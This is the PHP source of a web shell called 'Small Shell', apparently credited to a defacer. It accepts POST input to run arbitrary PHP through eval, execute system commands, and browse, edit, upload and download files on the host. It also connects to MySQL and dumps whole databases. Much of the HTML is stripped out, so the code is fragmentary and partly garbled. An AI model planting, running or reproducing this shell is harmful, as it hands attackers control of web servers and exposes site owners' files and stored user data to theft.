alturks.com # # Just for fun :) # ########################################################## error_reporting(E_ALL); @set_time_limit(0); function magic_q($s) { if(get_magic_quotes_gpc()) { $s=str_replace('\\\'','\'',$s); $s=str_replace('\\\\','\\',$s); $s=str_replace('\\"','"',$s); $s=str_replace('\\\0','\0',$s); } return $s; } function get_perms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } $head=<< Small Shell - Edited By KingDefacer headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='
###cmd###mysql###eval###
'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?>

'>

without arch gzip archive
'.htmlspecialchars($cmd)."
\n");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('Listing '.$e_work_dir.'
'); $handle=@opendir($work_dir); if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).''.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).''.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('

'); ?>

'.$e_work_dir." Edit
\n");
$f=@fopen($work_dir,'r');
?>
Error '.$e_work_dir."
\n");
else
{
fwrite($f,$file_text);
fclose($f);
echo(''.$e_work_dir." is saving
\n");
}
break;
}
}
break;
}
break;
}
case 'upload' :
{
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
$f=$_FILES["filename"]["name"];
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
else
{
echo('file is uploaded in '.$e_work_dir);
}
break;
}
case 'download' :
{
$fname=isset($_POST['fname'])?$_POST['fname']:'';
$temp_file=isset($_POST['temp_file'])?'on':'nn';
$f=@fopen($fname,'r');
if(!($f)) echo('file is not exists');
else
{
$archive=isset($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip')
{
Header("Content-Type:application/x-gzip\n");
$s=gzencode(fread($f,filesize($fname)));
Header('Content-Length: '.strlen($s)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
echo($s);
}
else
{
Header("Content-Type:application/octet-stream\n");
Header('Content-Length: '.filesize($fname)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
ob_start();
while(feof($f)===false)
{
echo(fread($f,10000));
ob_flush();
}
}
}
}
}
break;
}
case 'mysql' :
{
$action=isset($_POST['action'])?$_POST['action']:'query';
$user=isset($_POST['user'])?$_POST['user']:'';
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
$db=isset($_POST['db'])?$_POST['db']:'';
$host=isset($_POST['host'])?$_POST['host']:'localhost';
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
switch($action)
{
case 'dump' :
{
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
if($table_dump=='')
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$result=mysql_query('show tables',$mysql_link);
for($i=0;$i

User :Passwd :Host :DB :
without arch gzip archive
DB :
Only Table :
Save result to :

\n"); for($i=0;$i'.htmlspecialchars(mysql_field_name($result,$i)).' '); echo("\n\n"); for($i=0;$i'); for($j=0;$j'.(htmlspecialchars($rows[$j])).''); } echo("\n"); } echo("\n"); } mysql_close($mysql_link); } break; } } break; } } ?>

Edited By KingDefacer